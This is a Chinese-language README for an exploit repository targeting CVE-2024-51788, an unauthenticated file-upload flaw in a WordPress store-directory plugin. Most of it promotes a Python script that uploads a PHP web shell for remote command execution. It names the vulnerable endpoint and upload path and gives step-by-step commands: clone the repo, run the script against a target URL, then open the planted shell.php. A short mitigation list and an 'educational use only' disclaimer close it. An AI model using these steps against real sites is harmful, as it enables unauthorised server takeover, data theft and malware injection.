CVE-2024-51788 是一个新披露的严重漏洞,影响 The Novel Design Store Directory WordPress 插件(<= v4.3.0)。该漏洞允许未认证攻击者上传任意文件,包括恶意 Web Shell,从而在受影响的服务器上实现远程代码执行(RCE)。
🔴 严重性: 10.0 / 10(严重)
📅 发布时间: 2024年11月11日
📅 更新时间: 2024年11月12日
🔗 CWE ID: CWE-434 - 不受限制的文件上传
✅ 服务器完全沦陷 - 攻击者可获得网站的完全控制权并执行任意命令。
✅ 数据泄露 - 访问和修改敏感信息。
✅ 网站篡改与恶意软件注入 - 攻击者可修改网站内容或植入恶意软件。
✅ 权限提升 - 攻击者可能利用此漏洞提升权限并在网络内横向移动。
该漏洞源于 wp-admin/options-general.php?page=licence 端点对上传文件的校验不当。攻击者可在无需认证的情况下将恶意 PHP 脚本上传到 /wp-content/plugins/noveldesign-store-directory/images/ 目录,最终导致远程代码执行(RCE)。
🚨 促成攻击的关键因素:
已开发出一个基于 Python 的漏洞利用脚本来自动化攻击过程。该脚本:
✅ 绕过认证 - 使用随机 User-Agent 和 Cookie。
✅ 将恶意 PHP Shell 直接上传到服务器。
✅ 在受害机器上执行任意命令。
✅ 自动检测目标是否存在漏洞。
📌 漏洞利用用法:
usage: CVE-2024-51788.py [-h] -u URL
Exploit script for CVE-2024-51788 # by Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
🔍 如果成功,Shell 将被上传到:
/wp-content/plugins/noveldesign-store-directory/images/
1️⃣ 克隆仓库:
git clone https://github.com/Nxploit/CVE-2024-51788.git
cd CVE-2024-51788
2️⃣ 运行漏洞利用脚本:
python3 CVE-2024-51788.py -u http://target-wordpress-site.com
3️⃣ 访问上传的 Shell:
http://target-wordpress-site.com/wp-content/plugins/noveldesign-store-directory/images/shell.php
pip install requests argparse urllib3
🔹 更新到最新版本 - 将 The Novel Design Store Directory 插件更新至最新版本。
🔹 限制文件上传权限 - 仅允许安全的文件类型。
⚠️ 此漏洞利用脚本仅用于教育和研究目的。 未经适当授权对系统使用此漏洞利用脚本是非法的。作者不对任何滥用此信息的行为负责。
📌 作者:Nxploit | Khaled Alenazi | 🔥 关注以获取更多安全研究与漏洞利用!